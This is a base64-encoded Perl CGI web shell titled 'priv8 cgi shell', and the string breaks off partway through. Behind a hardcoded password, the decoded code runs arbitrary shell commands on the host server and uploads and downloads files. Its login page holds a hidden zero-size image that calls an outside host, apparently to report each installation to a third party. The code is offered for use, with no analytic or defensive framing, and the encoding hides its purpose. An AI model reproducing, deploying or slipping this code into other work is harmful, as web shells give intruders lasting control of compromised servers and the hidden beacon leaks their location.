'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgPGIgc3R5bGU9ImNvbG9yOmJsYWNrO2JhY2tncm91bmQtY29sb3I6I2ZmZmY2NiI+Q0dJIHNoZWxsPC9iPiAjIHNlcnZlcgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgQ29uZmlndXJhdGlvbjogWW91IG5lZWQgdG8gY2hhbmdlIG9ubHkgJFBhc3N3b3JkIGFuZCAkV2luTlQuIFRoZSBvdGhlcgojIHZhbHVlcyBzaG91bGQgd29yayBmaW5lIGZvciBtb3N0IHN5c3RlbXMuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KJFBhc3N3b3JkID0gInNvbmljIjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcwoJCQkJIyB0byBsb2dpbi4KCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2UgdGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZgoJCQkJIyB5b3UncmUgcnVubmluZyB0aGlzIHNjcmlwdCBvbiBhIFdpbmRvd3MgTlQKCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91CgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuCgokTlRDbWRTZXAgPSAiJiI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULgoKJFVuaXhDbWRTZXAgPSAiOyI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4LgoKJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gPSAxMDsJIyBUaW1lIGluIHNlY29uZHMgYWZ0ZXIgY29tbWFuZHMgd2lsbCBiZSBraWxsZWQKCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzCgkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0CgkJCQkjIHRha2UgdmVyeSBsb25nIHRvIGV4ZWN1dGUsIGxpa2UgImZpbmQgLyIuCgkJCQkjIFRoaXMgaXMgdmFsaWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzCgkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4KCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRhIGlzIHNlbnQgdG8gdGhlCgkJCQkjIGJyb3dzZXIgYXMgc29vbiBhcyBpdCBpcyBvdXRwdXQsIG90aGVyd2lzZQoJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kCgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UKCQkJCSMgcGluZywgc28gdGhhdCB5b3UgY2FuIHNlZSB0aGUgb3V0cHV0IGFzIGl0CgkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4KCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISEKCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOwokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7CiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOwokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOwoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJzZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQKIyBwYXJzZXMgR0VULCBQT1NUIGFuZCBtdWx0aXBhcnQvZm9ybS1kYXRhIHRoYXQgaXMgdXNlZCBmb3IgdXBsb2FkaW5nIGZpbGVzLgojIFRoZSBmaWxlbmFtZSBpcyBzdG9yZWQgaW4gJGlueydmJ30gYW5kIHRoZSBkYXRhIGlzIHN0b3JlZCBpbiAkaW57J2ZpbGVkYXRhJ30uCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAkaW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YKIyB0aGUgdmFyaWFibGUuIE5vdGU6IE1vc3Qgb2YgdGhlIGNvZGUgaW4gdGhpcyBmdW5jdGlvbiBpcyB0YWtlbiBmcm9tIG90aGVyIENHSQojIHNjcmlwdHMuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFJlYWRQYXJzZSAKewoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsKCWxvY2FsICgkaSwgJGxvYywgJGtleSwgJHZhbCk7CgkKCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOwoKCWlmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIkdFVCIpCgl7CgkJJGluID0gJEVOVnsnUVVFUllfU1RSSU5HJ307Cgl9CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikKCXsKCQliaW5tb2RlKFNURElOKSBpZiAkTXVsdGlwYXJ0Rm9ybURhdGEgJiAkV2luTlQ7CgkJcmVhZChTVERJTiwgJGluLCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsKCX0KCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBkYXRhCglpZigkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLykKCXsKCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZlciB0byBSRkMxODY3IAoJCUBsaXN0ID0gc3BsaXQoLyRCb3VuZGFyeS8sICRpbik7IAoJCSRIZWFkZXJCb2R5ID0gJGxpc3RbMV07CgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOwoJCSRIZWFkZXIgPSAkYDsKCQkkQm9keSA9ICQnOwogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMgdGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlCgkJJGlueydmaWxlZGF0YSd9ID0gJEJvZHk7CgkJJEhlYWRlciA9fiAvZmlsZW5hbWU9XCIoLispXCIvOyAKCQkkaW57J2YnfSA9ICQxOyAKCQkkaW57J2YnfSA9fiBzL1wiLy9nOwoJCSRpbnsnZid9ID1+IHMvXHMvL2c7CgoJCSMgcGFyc2UgdHJhaWxlcgoJCWZvcigkaT0yOyAkbGlzdFskaV07ICRpKyspCgkJeyAKCQkJJGxpc3RbJGldID1+IHMvXi4rbmFtZT0kLy87CgkJCSRsaXN0WyRpXSA9fiAvXCIoXHcrKVwiLzsKCQkJJGtleSA9ICQxOwoJCQkkdmFsID0gJCc7CgkJCSR2YWwgPX4gcy8oXihcclxuXHJcbnxcblxuKSl8KFxyXG4kfFxuJCkvL2c7CgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7CgkJCSRpbnska2V5fSA9ICR2YWw7IAoJCX0KCX0KCWVsc2UgIyBzdGFuZGFyZCBwb3N0IGRhdGEgKHVybCBlbmNvZGVkLCBub3QgbXVsdGlwYXJ0KQoJewoJCUBpbiA9IHNwbGl0KC8mLywgJGluKTsKCQlmb3JlYWNoICRpICgwIC4uICQjaW4pCgkJewoJCQkkaW5bJGldID1+IHMvXCsvIC9nOwoJCQkoJGtleSwgJHZhbCkgPSBzcGxpdCgvPS8sICRpblskaV0sIDIpOwoJCQkka2V5ID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gLj0gIlwwIiBpZiAoZGVmaW5lZCgkaW57JGtleX0pKTsKCQkJJGlueyRrZXl9IC49ICR2YWw7CgkJfQoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIFBhZ2UgSGVhZGVyCiMgQXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludFBhZ2VIZWFkZXIKewoJJEVuY29kZWRDdXJyZW50RGlyID0gJEN1cnJlbnREaXI7CgkkRW5jb2RlZEN1cnJlbnREaXIgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOwoJcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7CglwcmludCA8PEVORDsKPGh0bWw+CjxoZWFkPgo8dGl0bGU+cHJpdjggY2dpIHNoZWxsPC90aXRsZT4KJEh0bWxNZXRhSGVhZGVyCgo8bWV0YSBuYW1lPSJrZXl3b3JkcyIgY29udGVudD0icHJpdjggY2dpIHNoZWxsICBfICAgICBpNV9AaG90bWFpbC5jb20iPgo8bWV0YSBuYW1lPSJkZXNjcmlwdGlvbiIgY29udGVudD0icHJpdjggY2dpIHNoZWxsICBfICAgIGk1X0Bob3RtYWlsLmNvbSI+CjwvaGVhZD4KPGJvZHkgb25Mb2FkPSJkb2N1bWVudC5mLkBfLmZvY3VzKCkiIGJnY29sb3I9IiNGRkZGRkYiIHRvcG1hcmdpbj0iMCIgbGVmdG1hcmdpbj0iMCIgbWFyZ2lud2lkdGg9IjAiIG1hcmdpbmhlaWdodD0iMCIgdGV4dD0iI0ZGMDAwMCI+Cjx0YWJsZSBib3JkZXI9IjEiIHdpZHRoPSIxMDAlIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjIiPgo8dHI+Cjx0ZCBiZ2NvbG9yPSIjRkZGRkZGIiBib3JkZXJjb2xvcj0iI0ZGRkZGRiIgYWxpZ249ImNlbnRlciIgd2lkdGg9IjElIj4KPGI+PGZvbnQgc2l6ZT0iMiI+IzwvZm9udD48L2I+PC90ZD4KPHRkIGJnY29sb3I9IiNGRkZGRkYiIHdpZHRoPSI5OCUiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiPjxiPiAKPGIgc3R5bGU9ImNvbG9yOmJsYWNrO2JhY2tncm91bmQtY29sb3I6I2ZmZmY2NiI+cHJpdjggY2dpIHNoZWxsPC9iPiBDb25uZWN0ZWQgdG8gJFNlcnZlck5hbWU8L2I+PC9mb250PjwvdGQ+CjwvdHI+Cjx0cj4KPHRkIGNvbHNwYW49IjIiIGJnY29sb3I9IiNGRkZGRkYiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiPgoKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+VXBsb2FkIEZpbGU8L2ZvbnQ+PC9hPiB8IAo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1kb3dubG9hZCZkPSRFbmNvZGVkQ3VycmVudERpciI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPkRvd25sb2FkIEZpbGU8L2ZvbnQ+PC9hPiB8CjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWxvZ291dCI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPkRpc2Nvbm5lY3Q8L2ZvbnQ+PC9hPiB8CjwvZm9udD48L3RkPgo8L3RyPgo8L3RhYmxlPgo8Zm9udCBzaXplPSIzIj4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luU2NyZWVuCnsKCSRNZXNzYWdlID0gcSQ8L2ZvbnQ+PGgxPnBhc3M9cHJpdjg8L2gxPjxmb250IGNvbG9yPSIjMDA5OTAwIiBzaXplPSIzIj48cHJlPjxpbWcgYm9yZGVyPSIwIiBzcmM9Imh0dHA6Ly93d3cucHJpdjguaWJsb2dnZXIub3JnL3MucGhwPytjZ2l0ZWxuZXQgc2hlbGwiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjwvcHJlPgokOwojJwoJcHJpbnQgPDxFTkQ7Cjxjb2RlPgoKVHJ5aW5nICRTZXJ2ZXJOYW1lLi4uPGJyPgpDb25uZWN0ZWQgdG8gJFNlcnZlck5hbWU8YnI+CkVzY2FwZSBjaGFyYWN0ZXIgaXMgXl0KPGNvZGU+JE1lc3NhZ2UKRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIG1lc3NhZ2UgdGhhdCBpbmZvcm1zIHRoZSB1c2VyIG9mIGEgZmFpbGVkIGxvZ2luCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9naW5GYWlsZWRNZXNzYWdlCnsKCXByaW50IDw8RU5EOwo8Y29kZT4KPGJyPmxvZ2luOiBhZG1pbjxicj4KcGFzc3dvcmQ6PGJyPgpMb2dpbiBpbmNvcnJlY3Q8YnI+PGJyPgo8L2NvZGU+CkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gZm9yIGxvZ2dpbmcgaW4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRMb2dpbkZvcm0KewoJcHJpbnQgPDxFTkQ7Cjxjb2RlPgoKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+CjwvZm9udD4KPGZvbnQgc2l6ZT0iMyI+CmxvZ2luOiA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2Ij5wcml2OCBjZ2kgc2hlbGw8L2I+PGJyPgpwYXNzd29yZDo8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDk5MDAiIHNpemU9IjMiPjxpbnB1dCB0eXBlPSJwYXNzd29yZCIgbmFtZT0icCI+CjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJFbnRlciI+CjwvZm9ybT4KPC9jb2RlPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRNTCBQYWdlCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50UGFnZUZvb3Rlcgp7CglwcmludCAiPC9mb250PjwvYm9keT48L2h0bWw+IjsKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFJldHJlaXZlcyB0aGUgdmFsdWVzIG9mIGFsbCBjb29raWVzLiBUaGUgY29va2llcyBjYW4gYmUgYWNjZXNzZXMgdXNpbmcgdGhlCiMgdmFyaWFibGUgJENvb2tpZXN7Jyd9CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEdldENvb2tpZXMKewoJQGh0dHBjb29raWVzID0gc3BsaXQoLzsgLywkRU5WeydIVFRQX0NPT0tJRSd9KTsKCWZvcmVhY2ggJGNvb2tpZShAaHR0cGNvb2tpZXMpCgl7CgkJKCRpZCwgJHZhbCkgPSBzcGxpdCgvPS8sICRjb29raWUpOwoJCSRDb29raWVzeyRpZH0gPSAkdmFsOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBzY3JlZW4gd2hlbiB0aGUgdXNlciBsb2dzIG91dAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ291dFNjcmVlbgp7CglwcmludCAiPGNvZGU+Q29ubmVjdGlvbiBjbG9zZWQgYnkgZm9yZWlnbiBob3N0Ljxicj48YnI+PC9jb2RlPiI7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBMb2dzIG91dCB0aGUgdXNlciBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGxvZ2luIGFnYWluCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFBlcmZvcm1Mb2dvdXQKewoJcHJpbnQgIlNldC1Db29raWU6IFNBVkVEUFdEPTtcbiI7ICMgcmVtb3ZlIHBhc3N3b3JkIGNvb2tpZQoJJlByaW50UGFnZUhlYWRlcigicCIpOwoJJlByaW50TG9nb3V0U2NyZWVuOwoKCSZQcmludExvZ2luU2NyZWVuOwoJJlByaW50TG9naW5Gb3JtOwoJJlByaW50UGFnZUZvb3RlcjsKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGxvZ2luIHRoZSB1c2VyLiBJZiB0aGUgcGFzc3dvcmQgbWF0Y2hlcywgaXQKIyBkaXNwbGF5cyBhIHBhZ2UgdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gcnVuIGNvbW1hbmRzLiBJZiB0aGUgcGFzc3dvcmQgZG9lbnMndAojIG1hdGNoIG9yIGlmIG5vIHBhc3N3b3JkIGlzIGVudGVyZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlcgojIHRvIGxvZ2luCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFBlcmZvcm1Mb2dpbiAKewoJaWYoJExvZ2luUGFzc3dvcmQgZXEgJFBhc3N3b3JkKSAjIHBhc3N3b3JkIG1hdGNoZWQKCXsKCQlwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9JExvZ2luUGFzc3dvcmQ7XG4iOwoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJfQoJZWxzZSAjIHBhc3N3b3JkIGRpZG4ndCBtYXRjaAoJewoJCSZQcmludFBhZ2VIZWFkZXIoInAiKTsKCQkmUHJpbnRMb2dpblNjcmVlbjsKCQlpZigkTG9naW5QYXNzd29yZCBuZSAiIikgIyBzb21lIHBhc3N3b3JkIHdhcyBlbnRlcmVkCgkJewoJCQkmUHJpbnRMb2dpbkZhaWxlZE1lc3NhZ2U7CgoJCX0KCQkmUHJpbnRMb2dpbkZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGNvbW1hbmRzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CiRQcm9tcHQKPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRW50ZXIiPgo8L2Zvcm0+CjwvY29kZT4KCkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gZG93bmxvYWQgZmlsZXMKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRGaWxlRG93bmxvYWRGb3JtCnsKCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkQ3VycmVudERpcl1cJCAiOwoJcHJpbnQgPDxFTkQ7Cjxjb2RlPgo8Zm9ybSBuYW1lPSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImRvd25sb2FkIj4KJFByb21wdCBkb3dubG9hZDxicj48YnI+CkZpbGVuYW1lOiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+CkRvd25sb2FkOiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byB1cGxvYWQgZmlsZXMKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRGaWxlVXBsb2FkRm9ybQp7CgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsKCXByaW50IDw8RU5EOwo8Y29kZT4KCjxmb3JtIG5hbWU9ImYiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgokUHJvbXB0IHVwbG9hZDxicj48YnI+CkZpbGVuYW1lOiA8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+Ck9wdGlvbnM6ICZuYnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgdmFsdWU9Im92ZXJ3cml0ZSI+Ck92ZXJ3cml0ZSBpZiBpdCBFeGlzdHM8YnI+PGJyPgpVcGxvYWQ6Jm5ic3A7Jm5ic3A7Jm5ic3A7PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkJlZ2luIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9InVwbG9hZCI+CjwvZm9ybT4KPC9jb2RlPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHRpbWVvdXQgZm9yIGEgY29tbWFuZCBleHBpcmVzLiBXZSBuZWVkIHRvCiMgdGVybWluYXRlIHRoZSBzY3JpcHQgaW1tZWRpYXRlbHkuIFRoaXMgZnVuY3Rpb24gaXMgdmFsaWQgb25seSBvbiBVbml4LiBJdCBpcwojIG5ldmVyIGNhbGxlZCB3aGVuIHRoZSBzY3JpcHQgaXMgcnVubmluZyBvbiBOVC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgQ29tbWFuZFRpbWVvdXQKewoJaWYoISRXaW5OVCkKCXsKCQlhbGFybSgwKTsKCQlwcmludCA8PEVORDsKPC94bXA+Cgo8Y29kZT4KQ29tbWFuZCBleGN